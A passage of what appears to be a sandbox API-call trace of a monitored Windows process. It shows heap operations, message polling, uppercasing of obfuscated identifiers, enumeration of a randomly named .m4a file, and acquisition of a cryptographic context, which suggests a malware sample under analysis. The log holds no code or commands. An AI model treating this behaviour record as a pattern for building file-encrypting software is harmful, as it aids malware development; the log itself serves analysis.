ftLastWriteTime.dwHighDateTime=0x1d5c9b9, nFileSizeHigh=0x0, nFileSizeLow=0x7189, dwReserved0=0x0, dwReserved1=0x0, cFileName="fqpL_g35J.m4a", cAlternateFileName="FQPL_G~1.M4A")) returned 0x9a3b80 [0100.762] FindClose (in: hFindFile=0x9a3b80 | out: hFindFile=0x9a3b80) returned 1 [0100.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0100.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0100.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0100.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0100.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0100.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0100.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0100.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0100.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0100.762] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0100.762] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0100.762] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72098 [0100.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0100.762] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0100.762] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0100.762] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0100.762] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0100.762] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0100.762] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0100.763] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a728f8 [0100.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0100.763] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0100.763] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0100.763] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0100.763] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0100.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0100.763] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0100.763] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0100.763] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0100.763] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0100.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0100.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0100.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0100.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0100.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0100.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0100.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0100.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0100.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0100.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0100.763] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0100.763] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0100.763] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72098 [0100.763] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0100.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77df0 | out: hHeap=0x2af0000) returned 1 [0100.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0100.764] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0100.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0100.764] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0100.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0100.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0100.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0100.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0100.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0100.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0100.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0100.764] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0100.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0100.764] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0100.764] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0100.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0100.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0100.764] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0100.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0100.764] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0100.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77df0 | out: hHeap=0x2af0000) returned 1 [0100.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0100.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0100.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0100.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0100.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0100.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0100.764] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0100.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0100.764] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0100.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0100.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0100.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0100.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0100.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0100.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0100.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0100.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0100.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0100.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0100.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0100.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0100.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70e0 | out: hHeap=0x2af0000) returned 1 [0100.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0100.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0100.765] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0100.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0100.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0100.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0100.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0100.765] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0100.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0100.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0100.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0100.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0100.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0100.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0100.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0100.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0100.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0100.766] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0100.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0100.766] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0100.766] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0100.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0100.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0100.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0100.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0100.766] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0100.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0100.766] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0100.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0100.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0100.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0100.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0100.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0100.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0100.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0100.766] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0100.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0100.767] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0100.767] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0100.767] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0100.767] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0100.767] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0100.767] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0100.767] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0100.767] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0100.767] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0100.767] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0100.767] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0100.767] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0100.767] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0100.767] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0100.767] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0100.767] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0100.767] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0100.767] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0100.767] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0100.767] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0100.767] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0100.768] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0100.768] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0100.768] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f70e0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0100.768] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0100.768] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f6e80, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0100.774] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0x9beab0) returned 1 [0100.775] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0100.775] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0100.775] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0100.775] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0100.775] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0100.775] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0100.775] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0100.775] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0100.775] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0100.775] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0100.775] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0100.775] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0100.776] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0100.776] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0100.776] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0100.776] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0100.776] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0100.776] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0100.776] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0100.776] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0100.776] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0100.776] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0100.776] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0100.776] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0100.776] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0100.776] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0100.776] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0100.776] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0100.776] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0100.776] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0100.776] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0100.776] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0100.776] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0100.776] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0100.776] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0100.776] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0100.776] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0100.777] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 